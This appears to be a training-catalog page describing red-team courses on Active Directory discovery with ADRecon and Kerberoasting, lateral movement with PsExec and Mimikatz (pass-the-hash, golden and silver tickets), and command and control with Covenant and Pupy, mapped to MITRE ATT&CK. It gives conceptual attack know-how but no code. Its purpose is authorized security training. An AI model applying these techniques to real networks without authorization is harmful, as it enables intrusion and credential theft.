The Active Directory of a company is a valuable source of information for a red team specialist. In it, you can find information about users, computers, and even security policies. In this course, Discovery with ADRecon, you will learn about ADRecon, developed by Prashant Mahajan, which enables red team specialists to generate detailed reports from the Active Directory of a target company. First, you will discover the importance of Active Directory data in a red team engagement and how it can help you in further attacks. Then, you will see how to use the ADRecon tool to extract data from your client's Active Directory and generate a complete report about the environment. Finally, you will explore how to perform a Kerberoast attack using ADRecon, in which you gather service ticket hashes for accounts with service principal names and crack them offline using Hashcat. When you are finished with this course, you will have the skills and knowledge to extract valuable information from AD and plan your next attacks. This course covers five techniques from the MITRE ATT&CK framework: Password Policy Discovery (T1201), Permission Groups Discovery (T1069), Account Discovery (T1087), Data from Information Repositories (T1213) and Kerberoasting (T1208).

Table of contents
  1. Course Overview
  2. Active Directory Enumeration
  3. Resources

ATT&CK - Lateral Movement (TA0008)

Lateral Movement consists of techniques that adversaries use to enter and control remote systems on a network. Following through on their primary objective often requires exploring the network to find their target and subsequently gaining access to it. Reaching their objective often involves pivoting through multiple systems and accounts. Adversaries might install their own remote access tools to accomplish Lateral Movement or use legitimate credentials with native network and operating system tools, which may be stealthier.

Lateral Movement with PsExec

by Matt Glass

May 1, 2020 / 21m

Description

Would you like to learn how to execute commands and programs, and open command prompts or PowerShell sessions, on remote Windows hosts? In this course, Lateral Movement with PsExec, you will gain the ability to use PsExec to move laterally through a Windows domain from a host you have already exploited. First, you will learn how to use PsExec to run commands on remote Windows hosts. Next, you will discover how to leverage PsExec to run programs remotely. Finally, you will explore how to move laterally through a Windows domain using PsExec. PsExec needs credentials with local administrator rights on the target and SMB access to its ADMIN$ share: it copies a service binary there and registers a temporary service (PSEXESVC), both of which are well-known detection artifacts, so expect it to be noisy in a monitored environment. When you are finished with this course, you will have the skills and knowledge of PsExec needed to leverage it for lateral movement in a Windows domain.

Table of contents
  1. Course Overview
  2. Lateral Movement with PsExec
  3. Resources

Lateral Movement with Mimikatz

by Lee Allen

May 1, 2020 / 28m

Description

Would you like to move from system to system without clear text credentials? How about impersonating a domain controller to inject data of your choosing? In this course, Lateral Movement with Mimikatz, you will learn how to leverage the advanced lateral movement capabilities of the open-source Mimikatz project in post-exploitation activities. First, you will see how to 'Pass the Hash' to authenticate with an NT hash instead of a clear text password. Next, you will discover how Mimikatz reuses Kerberos tickets taken from memory with 'Pass the Ticket'. Finally, you will explore how to forge golden and silver tickets to impersonate domain users and service accounts; a golden ticket is a forged TGT signed with the krbtgt account's key, and a silver ticket is a forged service ticket signed with the target service account's key, so obtaining the relevant key is the prerequisite for each. When you are finished with this course, you will have the skills and knowledge of the open-source Mimikatz tool needed to emulate lateral movement techniques aligned with MITRE ATT&CK.

Table of contents
  1. Tool Introduction
  2. Lateral Movement and Defense Evasion with Mimikatz
  3. Resources

ATT&CK - Command and Control (TA0011)

Command and Control consists of techniques that adversaries may use to communicate with systems under their control within a victim network. Adversaries commonly attempt to mimic normal, expected traffic to avoid detection. There are many ways an adversary can establish command and control with various levels of stealth depending on the victim’s network structure and defenses.

Command and Control with Covenant

by Aaron Rosenmund

Dec 31, 2019 / 19m

Description

Testing systems against advanced adversary techniques is required not just for red team operations but for targeted testing of the defensive and detective measures on a network. Growing the skills to emulate steadily advancing adversary capabilities within your team is a moving target, complicated by the multitude of attack techniques available. In this course, Command and Control with Covenant, you will gain the ability to leverage the .NET in-memory compilation techniques used by the open-source Covenant project to emulate adversary communication within an environment. First, you will learn how to install the command and control infrastructure used to control compromised systems. Next, you will explore how to create and deploy the implants, called Grunts, that connect back to the adversary server. Finally, you will explore how to run tasks, gather information, and spread laterally within the Covenant C2 framework. When you are finished with this course, you will have the skills and knowledge of the Covenant command and control framework needed to emulate post-exploitation techniques aligned with MITRE ATT&CK.

Table of contents
  1. Tool Introduction
  2. Emulation Adversary C2 and Lateral Movement Operations with Covenant
  3. Resources

Command and Control with Pupy

by Matt Glass

Mar 5, 2020 / 25m

Description

Are you looking for a tool that can help you manage your target workstations after you have exploited them? In this course, Command and Control with Pupy, you will gain the ability to manage target sessions, collect information, and run additional attacks from a single interface. First, you will learn how to generate client files in Pupy. Next, you will discover how to use the different encryption protocols Pupy offers for its transports. Finally, you will explore how to capture information from targets using Pupy. When you are finished with this course, you will have the skills and knowledge needed to manage exploited targets with Pupy.

Table of contents
  1. Tool Introduction
  2. Command and Control, Privilege Escalation, and Collection with Pupy
  3. Resources